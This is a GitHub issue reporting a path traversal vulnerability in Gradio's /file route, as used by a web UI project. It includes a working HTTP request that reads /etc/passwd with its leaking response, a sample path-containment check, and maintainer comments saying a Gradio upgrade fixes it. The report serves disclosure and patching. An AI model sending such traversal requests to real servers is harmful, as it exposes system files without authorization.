
[Security]: Path traversal in /file routes caused by gradio #12822

Closed
1 task done
b1ank1108 opened this issue Aug 28, 2023 · 2 comments
Labels
bug-report Report of a bug, yet to be confirmed gradio Items related specifically to Gradio (user interface library). May or may not be upstream issues.

Comments

@b1ank1108

Is there an existing issue for this?

  • I have searched the existing issues and checked the recent builds/commits

What happened?

Path traversal happened in gradio==3.32.0.

gradio-app/gradio#4370

Steps to reproduce the problem

GET /file=/tmp/gradio/../../etc/passwd HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36

HTTP/1.1 200 OK
Date: Mon, 28 Aug 2023 00:44:10 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 975
Connection: close
accept-ranges: bytes
last-modified: Mon, 31 Jul 2023 11:23:49 GMT
etag: eadf5080653b3e15eaaeb15bb31c2d0f
x-process-time: 0.004

root:x:0:0:root:/root:/bin/bash
……

What should have happened?

HTTP/1.1 403 Forbidden
date: Mon, 28 Aug 2023 01:05:43 GMT
server: uvicorn
content-length: 60
content-type: application/json
Connection: close

{"detail":"File not allowed: /tmp/gradio/../../etc/passwd."}

Version or Commit where the problem happens

version: v1.5.1

What Python version are you running on?

None

What platforms do you use to access the UI?

No response

What device are you running WebUI on?

No response

Cross attention optimization

Automatic

What browsers do you use to access the UI?

No response

Command Line Arguments

no

List of extensions

no

Console logs

no

Additional information

No response

@b1ank1108 b1ank1108 added the bug-report Report of a bug, yet to be confirmed label Aug 28, 2023
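As an added illustration (not code from the webui or from Gradio), here is the kind of containment check that the expected 403 response above implies: the requested path is fully resolved before it is compared with the allowed directory, so `..` segments cannot escape, and whole-component comparison avoids the `/tmp/gradio-other` prefix trap. The allowed-directory list and the function names are constructed assumptions.

```python
import os
from typing import Iterable

# Constructed allowed-directory list for this example; a real app would take
# these from its configuration (its temp/output directories).
ALLOWED_DIRS = ["/tmp/gradio"]


def resolve(path: str) -> str:
    """Return an absolute path with '..' segments and symlinks collapsed."""
    return os.path.realpath(os.path.abspath(path))


def is_in_or_equal(path: str, directory: str) -> bool:
    """True if `path` is `directory` or lies beneath it.

    os.path.commonpath compares whole components, so '/tmp/gradio-other/x'
    is NOT treated as inside '/tmp/gradio' (a plain startswith() check
    would get this wrong).
    """
    path, directory = resolve(path), resolve(directory)
    try:
        return os.path.commonpath([path, directory]) == directory
    except ValueError:  # different drives on Windows: never inside
        return False


def check_file_request(requested: str, allowed_dirs: Iterable[str] = ALLOWED_DIRS):
    """Mimic the decision behind a '/file=<path>' route (hypothetical helper).

    Returns (status_code, detail) without opening the file: 200 with the
    resolved path if it is inside an allowed directory, otherwise the 403
    body listed in the issue as the expected response.
    """
    if any(is_in_or_equal(requested, d) for d in allowed_dirs):
        return 200, resolve(requested)
    return 403, {"detail": f"File not allowed: {requested}."}


if __name__ == "__main__":
    for p in ["/tmp/gradio/out.png",
              "/tmp/gradio/../../etc/passwd",
              "/tmp/gradio-other/x"]:
        print(p, "->", check_file_request(p))
```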
@catboxanon
Collaborator

Latest version of the webui bumps the Gradio version to 3.41.2 -- so I think this is fixed?

@catboxanon catboxanon added the gradio Items related specifically to Gradio (user interface library). May or may not be upstream issues. label Aug 28, 2023
@b1ank1108
Author

Sorry, I only looked at the master branch. It was fixed on dev branch.
